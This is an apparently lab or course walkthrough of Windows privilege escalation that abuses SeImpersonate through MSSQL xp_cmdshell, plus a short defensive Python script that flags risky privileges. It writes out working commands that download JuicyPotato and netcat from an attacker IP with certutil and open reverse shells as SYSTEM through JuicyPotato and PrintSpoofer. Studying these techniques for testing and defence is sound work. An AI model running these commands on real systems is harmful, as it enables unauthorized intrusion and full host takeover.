SeImpersonate and SeAssignPrimaryToken

  • In Windows, every process has a token that contains information about the particular account that is running it.

  • These tokens are not considered secure resources; they are simply locations in memory that could be brute-forced by users who cannot read memory.

  • To utilize the token, the SeImpersonate privilege is needed.

Legitimate programs may use another process's token to escalate from Administrator to LocalSystem. A process generally does this by calling into the WinLogon process to obtain a SYSTEM token, then executing itself with that token, placing itself in the SYSTEM space.

  • Attackers often abuse the SeImpersonate privilege with "potato-style" (e.g. JuicyPotato) privilege escalation, where a service account can impersonate (SeImpersonate) but does not hold full SYSTEM-level privileges.

  • In essence, the Potato attack tricks a process running as SYSTEM into connecting to the attacker's process, which hands over the SYSTEM token for use.

We will often find the SeImpersonate privilege enabled:

  • After gaining remote code execution via an application that runs in the context of a service account (think Jenkins, executing commands through MSSQL, or ASP/ASPX web shells on a web application).

SeImpersonate Example - JuicyPotato

Scenario: we have gained an initial foothold on the MSSQL server. The SQL service is running in the context of the default mssqlserver account, and we have achieved command execution through xp_cmdshell using a set of credentials found in a login.sql file on a file share with the Snaffler tool.

  1. Connect to the SQL server instance and confirm our privileges

sudo python2 /opt/impacket-0.9.19/examples/mssqlclient.py sql_dev@10.129.43.43 -windows-auth

  2. Enable xp_cmdshell

enable_xp_cmdshell

  3. Check our account privileges

xp_cmdshell whoami /priv

  • We can see we have the SeImpersonate privilege enabled.

  • We can use SeImpersonate to impersonate a privileged account such as NT AUTHORITY\SYSTEM.

  • We can use JuicyPotato to exploit the SeImpersonate or SeAssignPrimaryToken privileges via DCOM/NTLM reflection abuse.

  4. Exploit SeImpersonate with JuicyPotato

sudo wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

  • Upload both JuicyPotato and nc64.exe from our mssql session:

xp_cmdshell certutil.exe -urlcache -f http://10.10.14.91/JuicyPotato.exe jc.exe
xp_cmdshell certutil.exe -urlcache -f http://10.10.14.91/nc64.exe nc.exe

  • Start a netcat listener:

rlwrap -cAr nc -lvnp 9010

  • Execute jc.exe (JuicyPotato):

xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.91 9001 -e cmd.exe" -t *

  • -l: the COM server listening port. A COM server is an executable (EXE or DLL) that implements a set of COM objects and follows the standard COM rules for communicating with other COM components.

  • -p: the program to launch (cmd.exe)

  • -a: the arguments passed to cmd.exe

  • -t: the CreateProcess call to use; we specified *, meaning try both CreateProcessWithTokenW (requires SeImpersonate) and CreateProcessAsUser (requires SeAssignPrimaryToken)

  5. Look back at our listener: we have a shell as nt authority\system
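As a defender-side check added to these notes (not part of the original walkthrough), the following Python parses `whoami /priv` output like that from step 3 and reports the two privileges that potato-style tools rely on; the sample output is constructed for the example, not captured from a host.

```python
import re

# Constructed sample of `whoami /priv` output for a service account like the
# MSSQL one in the walkthrough above (not captured from a real host).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# The two privileges potato-style tools (JuicyPotato, RoguePotato, PrintSpoofer)
# depend on; a service account holding either one is a SYSTEM-escalation risk.
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}


def parse_whoami_priv(text):
    """Parse `whoami /priv` output into {privilege_name: state}."""
    lines = text.splitlines()
    # Take the name column's boundaries from the '=====' ruler: the longest
    # privilege name is followed by a single space, so splitting on runs of
    # whitespace would be unsafe for the description column.
    ruler_idx = next(i for i, line in enumerate(lines) if line.startswith("="))
    spans = [m.span() for m in re.finditer(r"=+", lines[ruler_idx])]
    name_start, name_end = spans[0]
    privs = {}
    for line in lines[ruler_idx + 1:]:
        if line.strip():
            # State is the last column and always a single word.
            privs[line[name_start:name_end].strip()] = line.split()[-1]
    return privs


def risky_token_privileges(text):
    """Impersonation-class privileges present on the token, with their state.
    Presence is what matters: a privilege listed as Disabled is still held by
    the token and can be enabled by the process itself, so filter on name."""
    return {name: state for name, state in parse_whoami_priv(text).items()
            if name in IMPERSONATION_PRIVS}


if __name__ == "__main__":
    for name, state in risky_token_privileges(SAMPLE_WHOAMI_PRIV).items():
        print(f"{name}: {state}")
```

Run against real output, any hit means the service account should be reviewed for whether it truly needs the privilege, regardless of whether the state shows Enabled or Disabled.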

PrintSpoofer and RoguePotato

  • JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards.

  • However, PrintSpoofer and RoguePotato can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM-level access.

  • These tools can be used to abuse impersonation privileges on Windows 10 and Server 2019.

Escalating privileges using PrintSpoofer

  • We can use this tool to spawn a SYSTEM process in our current console and interact with it, spawn a SYSTEM process on the desktop (if we are using RDP or logged on locally), or even catch a reverse shell.

  • Again, we will connect with Impacket's mssqlclient:

xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.91 9001 -e cmd.exe"
  • -c: the command to execute; in our case we want to establish a reverse shell with nc.exe.
